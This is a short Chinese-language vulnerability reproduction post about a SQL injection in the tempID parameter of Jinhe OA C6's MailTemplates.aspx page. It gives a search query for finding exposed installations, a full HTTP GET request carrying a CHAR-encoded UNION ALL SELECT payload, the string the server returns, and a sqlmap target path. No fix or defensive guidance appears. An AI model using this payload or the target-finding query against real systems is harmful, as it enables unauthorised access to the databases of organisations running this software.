登录 白背景

金和OA C6 MailTemplates存在SQL注入漏洞

一、漏洞简介

金和OA协同办公管理系统C6软件共有20多个应用模块,160多个应用子模块,涉及的企业管理业务包括协同办公管理、人力资源管理、项目管理、客户关系管理、企业目标管理、费用管理等多个业务范围,从功能型的协同办公平台上升到管理型协同管理平台,并不断的更新完善,全面支撑企业发展。金和OA C6 MailTemplates存在SQL注入漏洞。

二、影响版本

  • 金和OA

三、资产测绘

  • hunterapp.name="金和 OA"

image.png

  • 登录页面

image.png

四、漏洞复现

GET /C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28106%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28101%29%2BCHAR%28118%29%2BCHAR%2899%29%2BCHAR%28104%29%2BCHAR%28107%29%2BCHAR%2890%29%2BCHAR%28111%29%2BCHAR%28100%29%2BCHAR%28115%29%2BCHAR%2887%29%2BCHAR%2898%29%2BCHAR%2886%29%2BCHAR%2877%29%2BCHAR%28109%29%2BCHAR%28103%29%2BCHAR%2869%29%2BCHAR%28114%29%2BCHAR%28113%29%2BCHAR%28109%29%2BCHAR%2888%29%2BCHAR%2886%29%2BCHAR%28102%29%2BCHAR%28119%29%2BCHAR%28104%29%2BCHAR%2866%29%2BCHAR%2879%29%2BCHAR%2887%29%2BCHAR%28110%29%2BCHAR%28101%29%2BCHAR%28110%29%2BCHAR%28111%29%2BCHAR%28118%29%2BCHAR%2875%29%2BCHAR%2889%29%2BCHAR%2871%29%2BCHAR%2867%29%2BCHAR%2881%29%2BCHAR%2874%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2CNULL%2CNULL--+UUjO HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: ASP.NET_SessionId=4f3tjvzxcv5jafpefj14hsj0; myie=false
Content-Length: 0

image.png

qjbzqevchkZodsWbVMmgErqmXVfwhBOWnenovKYGCQJzjqxzqq

sqlmap

/C6/JHSoft.Web.Mail/MailTemplates.aspx/?tempID=1

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/pxvor28oyt0h1hgf